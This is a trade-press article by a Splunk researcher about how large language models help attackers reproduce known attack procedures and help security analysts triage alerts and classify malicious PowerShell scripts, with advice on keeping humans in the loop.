A Supporting Role: How LLMs Are Showing up In the Cyber Threat Landscape

Aug. 1, 2025
As large language models evolve, their influence on cybersecurity is rapidly expanding, empowering defenders with unprecedented capabilities but also lowering the barrier for attackers to scale threats with speed and precision.

As artificial intelligence becomes more advanced, large language models (LLMs) AI systems that can distill waves of data to create meaningful outputs for the user will become the foundation of future innovation. However, like with most forms of technology, the impact of these models will be subject to the skill of those using them.

We’re beginning to see this now in cybersecurity. While cyber defenders are using LLMs to protect the IT home front, threat actors are finding ways to make their attacks more efficient and dispersed on a larger scale. The good news is that large language models offer clear advantages for defenders in this ongoing battle against cyber threats. The key for cyber defenders will lie in their understanding of traditional and LLM-enabled cyber-attack use cases, effective LLM implementation for the defender community, and the proper tools and frameworks to track the progression of the technology. 

The Current Relationship Between LLMs and Threat Actors

One of the key advantages LMMs offer to threat actors is their ability to democratize access to cyber-attack knowledge. The barrier to entry for recreating cyber-attack procedures is significantly lower than ever before. Any modern LLM enables users with little technical background to write functional code, like a remote access tool, which could potentially be misused.

The good news is that many of the potential new threats, such as automated exploitation or widespread personalized phishing scams, remain theoretical for now. Current model capabilities limit threat actors from fully leveraging AI for high-impact cyber-attacks and still require human intervention and expertise to carry out complex, multi-stage attacks.

However, what happens when those bottlenecks are no longer present? Recently, Splunk researched to detect just how proficient current LLMs were at aiding current versions of cyber-attacks — and how close we may be to automated attacks in the future.

Now is the time for cybersecurity professionals to dedicate efforts and attention to understanding emerging risks, anticipating attack scenarios, and developing effective defenses, as the capabilities of models in this domain will continue to improve.

The evaluation found that open-weight models, leveraged as an assistant, can improve the speed and efficiency of attacks by accurately recreating attack procedures in 45% of test cases overall, with as high as 80 to 100% for many common attack techniques. This research suggests that, while LLMs are unable to produce new types of attacks, they are highly proficient in reproducing many specific attack procedures that already exist.

Now is the time for cybersecurity professionals to dedicate efforts and attention to understanding emerging risks, anticipating attack scenarios, and developing effective defenses, as the capabilities of models in this domain will continue to improve.

Using LLMs Correctly 

If cyber defenders aren’t careful, the dangers of LLMs may not only come from threat actors but also from unintended risks or consequences caused by the defender's misuse of LLMs. AI systems come with their technical management complexities and their own ecosystem of cybersecurity risks.

Before implementing AI in any analyst workflow, it’s essential to make a few determinations:

●     Where will LLMs be most effective, and what does my team need? Identify repetitive, time-consuming, and detail-oriented problems that involve summarizing and or generating large amounts of human-language text.

●     What does intervention look like? Remember, AI is here to help the cybersecurity team. Determine where in the workflow analysts should check the LLMs' work to ensure SoC decisions are made on accurate insights. It is vital to keep a human in the loop.

●     How often should our team audit the LLMs work? The team should regularly check the LLM outputs, as well as the overall effectiveness of the process. Over time, the model, or the problem, may drift.

Answering these questions will help your teams identify high-impact use cases enabled by today's LLMs. 

The Underlying Potential for Cyber Defenders 

Once analyst teams determine when and how to use AI effectively, there is a real chance to optimize productivity using LLMs. Just like LLMs can help mitigate burnout for content creation or research, they can also help analysts streamline and triage security alerts and event review. Due to their ability to comprehend human language, cyber analysts can fine-tune LLMs to help with increasingly specific cyber-domain-related tasks.

Models can also help speed up post-cyber incident issues, such as summarizing the details of an attack and the SOC’s corresponding response. In a threat hunting exercise, we tested how multiple open-weight LLMs would perform in classifying the intent of 2,000 PowerShell scripts — 1,000 had benign code and 1,000 had malicious code. 

The results produced a promising combination of high accuracy, with very few false negatives. In addition, the time to classify varied between .75 seconds and 3 seconds per script. This amounted to a reduction in initial classification time of PowerShell scripts by 99%, when compared to an average human analyst classification of a script requiring 5 to 12 minutes! 

What the LLM Future Holds for Both Defender and Attacker

The future application of LLMs in security is both exciting and harrowing. We know that on the horizon is the steadily increasing use of agentic AI, or AI systems that can learn, make, and execute decisions independently. As threat actors develop AI agents with attack capabilities, the ability to deploy them at scale may substantially increase the speed of effective cyber-attacks. Now is the time for cyber defenders to improve their understanding and application of LLMs to keep parity with any advances in attacks. With the overwhelming scale and variety of text-based analysis tasks in the modern SOC, the near-term impact of the “AI-edge” is the defenders' for the taking. 

About the Author

Ryan Fetterman | Senior Manager at Splunk on the SURGe team

Ryan Fetterman is a Senior Manager at Splunk on the SURGe team, joining after over a decade spent in windowless basements conducting government research and consulting. He is a co-author of the PEAK Threat Hunting Framework and the upcoming Threat Hunter’s Cookbook. Ryan holds a Doctorate and a master’s degree in engineering from George Washington University and a cybersecurity undergraduate degree from Penn State University. His favorite part of any project is when someone says, “We just got new data."